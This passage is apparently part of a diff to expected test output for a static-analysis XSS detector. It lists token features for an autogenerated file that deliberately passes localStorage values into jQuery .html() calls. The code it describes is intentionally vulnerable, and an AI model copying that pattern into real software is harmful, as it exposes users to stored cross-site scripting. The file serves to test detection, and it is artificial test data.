localStorage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:27 | localStorage | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:27 | localStorage | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:27 | localStorage | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:35 | localStorage.getItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:35 | localStorage.getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:35 | localStorage.getItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:35 | localStorage.getItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:35 | localStorage.getItem | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:44 | exceptional return of localSt ... local') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:44 | exceptional return of localSt ... local') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:44 | exceptional return of localSt ... local') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:44 | exceptional return of localSt ... local') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:44 | exceptional return of localSt ... local') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:44 | localSt ... local') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:44 | localSt ... local') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:44 | localSt ... local') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:44 | localSt ... local') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:44 | localSt ... local') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:29:10:35 | getItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:29:10:35 | getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:29:10:35 | getItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:29:10:35 | getItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:29:10:35 | getItem | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:10:37:10:43 | 'local' | CalleeFlexibleAccessPath | localStorage.getItem | | autogenerated/Xss/DomBasedXss/stored-xss.js:10:37:10:43 | 'local' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:10:37:10:43 | 'local' | contextFunctionInterfaces | | @@ -15322,6 +109302,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:10:37:10:43 | 'local' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:10:37:10:43 | 'local' | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:10:37:10:43 | 'local' | receiverName | localStorage | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:5 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:5 | $ | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:5 | $ | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:5 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:13 | $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:13 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:13 | $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:13 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:13 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:13 | exceptional return of $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:13 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:13 | exceptional return of $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:13 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:13 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:18 | $('myId').html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:18 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:18 | $('myId').html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:18 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:18 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:55 | $('myId ... r") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:55 | $('myId ... r") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:55 | $('myId ... r") | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:55 | $('myId ... r") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:55 | $('myId ... r") | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:55 | exceptional return of $('myId ... r") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:55 | exceptional return of $('myId ... r") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:55 | exceptional return of $('myId ... r") | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:55 | exceptional return of $('myId ... r") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:5:12:55 | exceptional return of $('myId ... r") | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:12:7:12:12 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/stored-xss.js:12:7:12:12 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:12:7:12:12 | 'myId' | contextFunctionInterfaces | | @@ -15329,12 +109339,22 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:12:7:12:12 | 'myId' | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | | autogenerated/Xss/DomBasedXss/stored-xss.js:12:7:12:12 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:12:7:12:12 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:15:12:18 | html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:15:12:18 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:15:12:18 | html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:15:12:18 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:15:12:18 | html | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:12:20:12:31 | " something | | autogenerated/Xss/DomBasedXss/stored-xss.js:12:20:12:31 | "foobar' | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:20:12:38 | " something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:12:20:12:38 | "" | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/stored-xss.js:12:20:12:54 | "" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:12:20:12:54 | "" | contextFunctionInterfaces | | @@ -15354,6 +109374,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:12:42:12:54 | ">foobar" | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:12:42:12:54 | ">foobar" | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:12:42:12:54 | ">foobar" | stringConcatenatedWith | 'foobar href indexOf " 1 $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:12 | href | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:12 | href | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:26 | exceptional return of href.indexOf("\\"") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:26 | exceptional return of href.indexOf("\\"") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:26 | exceptional return of href.indexOf("\\"") | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:26 | exceptional return of href.indexOf("\\"") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:26 | exceptional return of href.indexOf("\\"") | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:26 | href.indexOf("\\"") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:26 | href.indexOf("\\"") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:26 | href.indexOf("\\"") | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:26 | href.indexOf("\\"") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:26 | href.indexOf("\\"") | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:33 | href.in ... !== -1 | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:33 | href.in ... !== -1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:33 | href.in ... !== -1 | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:33 | href.in ... !== -1 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:9:14:33 | href.in ... !== -1 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:14:14:20 | indexOf | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:14:14:20 | indexOf | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:14:14:20 | indexOf | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:14:14:20 | indexOf | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:14:14:20 | indexOf | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:14:22:14:25 | "\\"" | CalleeFlexibleAccessPath | href.indexOf | | autogenerated/Xss/DomBasedXss/stored-xss.js:14:22:14:25 | "\\"" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:14:22:14:25 | "\\"" | contextFunctionInterfaces | | @@ -15362,6 +109407,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:14:22:14:25 | "\\"" | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:14:22:14:25 | "\\"" | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:14:22:14:25 | "\\"" | receiverName | href | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:32:14:33 | -1 | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:32:14:33 | -1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:32:14:33 | -1 | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:32:14:33 | -1 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:32:14:33 | -1 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:33:14:33 | 1 | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:33:14:33 | 1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:33:14:33 | 1 | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:33:14:33 | 1 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:14:33:14:33 | 1 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:5 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:5 | $ | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:5 | $ | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:5 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:13 | $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:13 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:13 | $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:13 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:13 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:13 | exceptional return of $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:13 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:13 | exceptional return of $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:13 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:13 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:18 | $('myId').html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:18 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:18 | $('myId').html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:18 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:18 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:46 | $('myId ... + "/>") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:46 | $('myId ... + "/>") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:46 | $('myId ... + "/>") | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:46 | $('myId ... + "/>") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:46 | $('myId ... + "/>") | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:46 | exceptional return of $('myId ... + "/>") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:46 | exceptional return of $('myId ... + "/>") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:46 | exceptional return of $('myId ... + "/>") | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:46 | exceptional return of $('myId ... + "/>") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:5:17:46 | exceptional return of $('myId ... + "/>") | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:17:7:17:12 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/stored-xss.js:17:7:17:12 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:17:7:17:12 | 'myId' | contextFunctionInterfaces | | @@ -15369,12 +109454,22 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:17:7:17:12 | 'myId' | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | | autogenerated/Xss/DomBasedXss/stored-xss.js:17:7:17:12 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:17:7:17:12 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:15:17:18 | html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:15:17:18 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:15:17:18 | html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:15:17:18 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:15:17:18 | html | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:17:20:17:31 | " something | | autogenerated/Xss/DomBasedXss/stored-xss.js:17:20:17:31 | "' | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:20:17:38 | " something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:17:20:17:38 | "" | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/stored-xss.js:17:20:17:45 | "" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:17:20:17:45 | "" | contextFunctionInterfaces | | @@ -15394,6 +109489,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:17:42:17:45 | "/>" | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:17:42:17:45 | "/>" | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:17:42:17:45 | "/>" | stringConcatenatedWith | 'foobar href indexOf " 1 $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:9:19:13 | href2 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:9:19:13 | href2 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:9:19:45 | href2 | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:9:19:45 | href2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:9:19:45 | href2 | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:9:19:45 | href2 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:9:19:45 | href2 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:9:19:45 | href2 = ... local') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:9:19:45 | href2 = ... local') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:9:19:45 | href2 = ... local') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:9:19:45 | href2 = ... local') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:9:19:45 | href2 = ... local') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:28 | localStorage | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:28 | localStorage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:28 | localStorage | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:28 | localStorage | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:28 | localStorage | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:36 | localStorage.getItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:36 | localStorage.getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:36 | localStorage.getItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:36 | localStorage.getItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:36 | localStorage.getItem | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:45 | exceptional return of localSt ... local') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:45 | exceptional return of localSt ... local') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:45 | exceptional return of localSt ... local') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:45 | exceptional return of localSt ... local') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:45 | exceptional return of localSt ... local') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:45 | localSt ... local') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:45 | localSt ... local') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:45 | localSt ... local') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:45 | localSt ... local') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:17:19:45 | localSt ... local') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:30:19:36 | getItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:30:19:36 | getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:30:19:36 | getItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:30:19:36 | getItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:19:30:19:36 | getItem | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:19:38:19:44 | 'local' | CalleeFlexibleAccessPath | localStorage.getItem | | autogenerated/Xss/DomBasedXss/stored-xss.js:19:38:19:44 | 'local' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:19:38:19:44 | 'local' | contextFunctionInterfaces | | @@ -15402,6 +109537,31 @@ 